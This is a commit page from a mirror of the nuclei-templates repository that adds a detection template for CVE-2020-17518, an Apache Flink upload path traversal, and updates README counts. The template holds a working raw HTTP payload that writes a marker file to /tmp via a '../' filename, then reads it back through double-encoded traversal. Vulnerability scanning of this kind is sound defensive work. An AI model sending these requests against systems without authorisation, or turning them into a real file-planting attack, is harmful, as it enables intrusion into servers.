daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #736 from projectdiscovery/CVE2020-17518 

Adding CVE-2020-17518
patch-1
PD-Team 2021-01-06 23:10:19 +05:30 committed by GitHub
parent b5538255a3 2471e9b776
commit b543fb132f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 35 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
README.md
View File

@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
| Templates | Counts | Templates | Counts |
| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
| cves | 146 | files | 48 |
| cves | 147 | files | 48 |
| vulnerabilities | 42 | panels | 50 |
| technologies | 41 | security-misconfiguration | 29 |
| workflows | 17 | tokens | 8 |
@ -151,6 +151,7 @@ An overview of the nuclei template directory including number of templates and H
│   ├── CVE-2020-16952.yaml
│   ├── CVE-2020-17505.yaml
│   ├── CVE-2020-17506.yaml
│   ├── CVE-2020-17518.yaml
│   ├── CVE-2020-17519.yaml
│   ├── CVE-2020-2096.yaml
│   ├── CVE-2020-2140.yaml
@ -480,7 +481,7 @@ An overview of the nuclei template directory including number of templates and H
</details>
**24 directories, 421 files**.
**24 directories, 422 files**.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding.

32
cves/2020/CVE-2020-17518.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2020-17518
info:
name: Apache Flink Upload Path Traversal
author: pd-team
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
requests:
- raw:
- |
POST /jars/upload HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"
test-poc
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
- method: GET
path:
- '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc'
matchers:
- type: dsl
dsl:
- 'contains(body, "test-poc") == true && status_code == 200' # Using CVE-2020-17519 to confirm this.